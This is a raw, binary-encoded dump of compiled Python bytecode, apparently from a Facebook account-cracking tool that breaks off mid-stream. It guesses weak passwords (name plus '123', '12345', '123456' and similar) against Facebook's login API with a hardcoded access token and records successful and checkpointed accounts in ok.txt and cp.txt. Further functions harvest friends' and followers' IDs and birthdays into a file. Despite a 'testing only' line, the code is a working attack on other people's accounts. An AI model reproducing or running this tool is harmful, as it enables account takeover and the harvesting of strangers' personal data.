backgroundi/\x00\x00\x00t\x01\x00\x00\x00-c\x01\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00sE\x07\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y\x1c\x07|\x03\x00d\x02\x00\x17}\x04\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x04\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd0\x00d\t\x00GHd\n\x00t\x07\x00d\x0b\x00\x19\x17GHd\x0c\x00|\x01\x00\x17GHd\r\x00|\x04\x00\x17d\x0e\x00\x17GHt\x08\x00d\x0f\x00d\x10\x00\x83\x02\x00}\x07\x00|\x07\x00j\t\x00d\x11\x00|\x01\x00\x17d\x12\x00\x17|\x04\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\x07\x00j\n\x00\x83\x00\x00\x01nf\x06d\x13\x00|\x06\x00k\x06\x00r\x18\x01d\x14\x00GHd\x15\x00t\x07\x00d\x0b\x00\x19\x17GHd\x16\x00|\x01\x00\x17GHd\x17\x00|\x04\x00\x17d\x0e\x00\x17GH\x88\x01\x00j\x0b\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\x1e\x06|\x03\x00d\x18\x00\x17}\x08\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x08\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xbc\x01d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x08\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x08\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nz\x05d\x13\x00|\x06\x00k\x06\x00r\x1f\x02d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x08\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x08\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x17\x05|\x03\x00d\x1f\x00\x17}\x0b\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0b\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|
\x06\x00d\x08\x00\x19k\x06\x00r\xc3\x02d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0b\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0b\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01ns\x04d\x13\x00|\x06\x00k\x06\x00r&\x03d \x00|\x02\x00\x17d\x1a\x00\x17|\x0b\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0b\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x10\x04|\x03\x00d!\x00\x17}\x0c\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0c\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xca\x03d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0c\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0c\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nl\x03d\x13\x00|\x06\x00k\x06\x00r-\x04d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0c\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0c\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\t\x03d"\x00}\r\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\r\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xcd\x04d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\r\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\r\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01ni\x02d\x13\x00|\x06\x00k\x06\x00r0\x05d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\r\x00\x17d\x1d\x00\x17GHt\x08\x00d\
x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\r\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x06\x02d#\x00}\x0e\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0e\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd0\x05d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0e\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0e\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nf\x01d\x13\x00|\x06\x00k\x06\x00r3\x06d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0e\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0e\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x03\x01d$\x00}\x0f\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0f\x00\x17d\x05\x00\x17d\x06\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x07\x00|\x06\x00d\x08\x00\x19k\x06\x00r\xd3\x06d\x19\x00|\x02\x00\x17d\x1a\x00\x17|\x0f\x00\x17GHt\x08\x00d\x1b\x00d\x10\x00\x83\x02\x00}\t\x00|\t\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0f\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\t\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01nc\x00d\x13\x00|\x06\x00k\x06\x00r6\x07d\x1c\x00|\x02\x00\x17d\x1a\x00\x17|\x0f\x00\x17d\x1d\x00\x17GHt\x08\x00d\x1e\x00d\x10\x00\x83\x02\x00}\n\x00|\n\x00j\t\x00|\x02\x00d\x1a\x00\x17|\x0f\x00\x17d\x0e\x00\x17\x83\x01\x00\x01|\n\x00j\n\x00\x83\x00\x00\x01\x88\x01\x00j\x0b\x00|\x02\x00\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00NR@\x00\x00\x00t\x03\x00\x00\x00123s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac
27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=vi_vn&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705cR.\x00\x00\x00s\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs\x1c\x00\x00\x00\x1b[1;96m[\xe2\x9c\x96] \x1b[1;93mCEKPOINTs-\x00\x00\x00\x1b[1;96m[\xe2\x9c\xba] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93mR\x17\x00\x00\x00s-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mID \x1b[1;91m : \x1b[1;93ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93ms\x01\x00\x00\x00\ns\x10\x00\x00\x00out/super_cp.txtt\x01\x00\x00\x00as\x03\x00\x00\x00ID:s\x04\x00\x00\x00 Pw:t\x0c\x00\x00\x00access_tokens\x1c\x00\x00\x00\x1b[1;96m[\xe2\x9c\x93] \x1b[1;92mBERHASILs-\x00\x00\x00\x1b[1;96m[\xe2\x9c\xba] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mID \x1b[1;91m : \x1b[1;92ms-\x00\x00\x00\x1b[1;96m[\xe2\x9e\xb9] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92mt\x04\x00\x00\x001234s\x11\x00\x00\x00\x1b[1;93m[RAKA-CP] s\x03\x00\x00\x00 | s\x06\x00\x00\x00cp.txts\x18\x00\x00\x00\x1b[1;92m[RAKA-OK] \x1b[1;30ms\x06\x00\x00\x00\x1b[1;0ms\x06\x00\x00\x00ok.txtt\x05\x00\x00\x0012345s\x19\x00\x00\x00 \x1b[1;92m[RAKA-OK] \x1b[1;30mt\x06\x00\x00\x00123456t\x06\x00\x00\x00223344t\x06\x00\x00\x00334455t\x06\x00\x00\x00445566(\x0c\x00\x00\x00t\x05\x00\x00\x00splitR\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R 
\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x01\x00\x00\x00bR\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x06\x00\x00\x00append(\x10\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userR7\x00\x00\x00R\x17\x00\x00\x00t\x05\x00\x00\x00pass1R*\x00\x00\x00t\x01\x00\x00\x00dt\x03\x00\x00\x00cekt\x05\x00\x00\x00pass2t\x02\x00\x00\x00cpR?\x00\x00\x00t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5t\x05\x00\x00\x00pass6t\x05\x00\x00\x00pass7(\x02\x00\x00\x00t\x03\x00\x00\x00cpst\x03\x00\x00\x00oks(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00main$\x01\x00\x00s\xe0\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01\n\x01(\x01\x0f\x01\x10\x01\x05\x01\r\x01\t\x01\r\x01\x0f\x01\x1d\x01\r\x02\x0c\x01\x05\x01\r\x01\t\x01\r\x01\x14\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\n\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x10\x02\x06\x01(\x01\x0f\x01\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x10\x02\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x03\x01i\x1e\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;93mProcess has completeds\x15\x00\x00\x00\x1b[1;93mTotal Cp/Ok : t\x01\x00\x00\x00/s\x1b\x00\x00\x00\x1b[1;93mPress enter to back (\x1d\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 
\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x0f\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00R2\x00\x00\x00t\n\x00\x00\x00view_tokent\x0b\x00\x00\x00extract_dobR\x0b\x00\x00\x00t\x06\x00\x00\x00logoutR\x12\x00\x00\x00R\x13\x00\x00\x00R=\x00\x00\x00t\x03\x00\x00\x00strt\x03\x00\x00\x00lenR"\x00\x00\x00R#\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00map(\x0c\x00\x00\x00t\x06\x00\x00\x00selectR4\x00\x00\x00t\x03\x00\x00\x00idtR)\x00\x00\x00R*\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00iR7\x00\x00\x00t\x02\x00\x00\x00naR+\x00\x00\x00Ra\x00\x00\x00t\x01\x00\x00\x00p(\x00\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R=\x00\x00\x00\xc6\x00\x00\x00s\xce\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01\x1b\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01!\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01\x07\x01\x15\x01\r\x01\x05\x01\x05\x01\t\x01\x05\x03\x12\x80\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01)\x01\x05\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sO\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHd\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01d\x02\x00GHt\x03\x00d\x06\x00\x83\x01\x00\x01t\x04\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s#\x00\x00\x00\t \x1b[1;32mLogged In Token \x1b[0;97ms\t\x00\x00\x00 Token : s\x11\x00\x00\x00cat .fb_token.txts\x1a\x00\x00\x00 Press enter to main menu 
(\x05\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rc\x00\x00\x00\xb0\x01\x00\x00s\x14\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x05\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sQ\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00t\x03\x00\x17d\x04\x00\x17t\x04\x00\x17GHd\x02\x00GHt\x05\x00d\x05\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x06\x00\x83\x01\x00\x01t\x06\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x0b\x00\x00\x00Logout Menus&\x00\x00\x00\x1b[1;93mDo you really want to logout ? s\x14\x00\x00\x00rm -rf .fb_token.txt(\x07\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x0e\x00\x00\x00R\x0b\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Re\x00\x00\x00\xbb\x01\x00\x00s\x10\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\n\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x9a\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn+\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rF\x00\x01\x01\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x05\x00GHt\r\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00i\x01\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00Extract DOB Of IDs\x1f\x00\x00\x00\x1b[1;93m[1] Grab from friendlists\x1e\x00\x00\x00\x1b[1;93m[2] Grab from followerss\x19\x00\x00\x00\x1b[1;93m[3] Grab single 
ids\x0f\x00\x00\x00\x1b[1;93m[4] Back(\x0e\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x15\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00t\n\x00\x00\x00dob_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rd\x00\x00\x00\xc4\x01\x00\x00s \x00\x00\x00\x00\x02\x03\x01\x19\x01\x13\x01\r\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s~\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00rV\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00yD\x00t\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x04\x00d\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn5\x00\x04t\x0b\x00k\n\x00r\xce\x00\x01\x01\x01d\x04\x00GHd\x0c\x00t\x0c\x00\x17GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x05\x00x\xc7\x01|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\x0e\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0f\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\r\x01Wnv\x01|\x00\x00d\x14\x00k\x02\x00r\x8a\x02t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x15\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00yD\x00t\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x04\x00d\x16\x00|\x04\x00d\x0b\x00\x19\x17G
HWn\'\x00\x04t\x0b\x00k\n\x00r\xfe\x01\x01\x01\x01d\x17\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x18\x00\x17t\x06\x00\x17d\x19\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x05\x00x\x93\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\x0e\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0f\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qA\x02WnB\x00|\x00\x00d\x1a\x00k\x02\x00r\xa0\x02t\x10\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x1b\x00k\x02\x00r\xb6\x02t\x11\x00\x83\x00\x00\x01n\x16\x00d\x04\x00GHd\x1c\x00GHd\x04\x00GHt\r\x00\x83\x00\x00\x01d\x1d\x00t\x12\x00t\x13\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1e\x00GHd\x1f\x00GHd\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GH\x87\x00\x00f\x01\x00d"\x00\x86\x00\x00}\n\x00t\x14\x00d#\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x15\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GHd$\x00GHd%\x00t\x12\x00t\x13\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GHt\x00\x00d&\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01d\x00\x00S(\'\x00\x00\x00Ns\x14\x00\x00\x00\n Choose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s+\x00\x00\x00\t \x1b[1;32mGrab DOB From Friendlist\x1b[0;97ms\x0f\x00\x00\x00 Put Id/user : s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00s\x0c\x00\x00\x00Target Id : R\x17\x00\x00\x00s\x13\x00\x00\x00\x1b[1;31mID Not Founds\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R@\x00\x00\x00R\r\x00\x00\x00s&\x00\x00\x00\x1b[1;32m Grab DOB From Followers\x1b[0;97ms\x0e\x00\x00\x00Target user : s\x1f\x00\x00\x00\t \x1b[1;31mID Not 
Found\x1b[0;97ms\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000RA\x00\x00\x00RB\x00\x00\x00s&\x00\x00\x00\t \x1b[1;31mSelect valid option\x1b[0;97ms\x14\x00\x00\x00\x1b[1;93mTotal ID : s\x1e\x00\x00\x00\x1b[1;93mThe Process has starteds&\x00\x00\x00\x1b[1;93mNote : This is for testing onlyi/\x00\x00\x00RE\x00\x00\x00c\x01\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00s\xce\x00\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y\xa5\x00t\x01\x00j\x02\x00d\x02\x00|\x02\x00\x17d\x03\x00\x17t\x03\x00\x17d\x04\x00t\x04\x00\x83\x01\x01j\x05\x00}\x04\x00t\x06\x00j\x07\x00|\x04\x00\x83\x01\x00}\x05\x00|\x05\x00d\x05\x00\x19}\x06\x00d\x06\x00|\x02\x00\x17d\x07\x00\x17|\x03\x00\x17d\x08\x00\x17|\x06\x00\x17d\t\x00\x17GHt\x08\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\t\x00|\x03\x00d\x08\x00\x17|\x02\x00\x17d\x08\x00\x17|\x06\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00t\x0c\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\r\x00\x00\x00NR@\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00t\x08\x00\x00\x00birthdays\x08\x00\x00\x00\x1b[1;32m s\t\x00\x00\x00 \x1b[1;30m s\x03\x00\x00\x00 | s\x07\x00\x00\x00\x1b[0;97ms\x08\x00\x00\x00dobs.txtRH\x00\x00\x00s\x01\x00\x00\x00\n(\r\x00\x00\x00RP\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00R 
\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00RR\x00\x00\x00t\x06\x00\x00\x00number(\x08\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00R7\x00\x00\x00R\x17\x00\x00\x00R*\x00\x00\x00RV\x00\x00\x00t\x01\x00\x00\x00yt\x03\x00\x00\x00nmb(\x01\x00\x00\x00t\x03\x00\x00\x00nms(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ra\x00\x00\x00\x19\x02\x00\x00s\x1a\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01$\x01\x0f\x01\n\x01\x1d\x01\x0f\x01!\x01\n\x01\x11\x02\x03\x01i\x1e\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;93mProcess has completeds\x14\x00\x00\x00\x1b[1;93mTotal DOB : s\x16\x00\x00\x00\n Press enter to back (\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 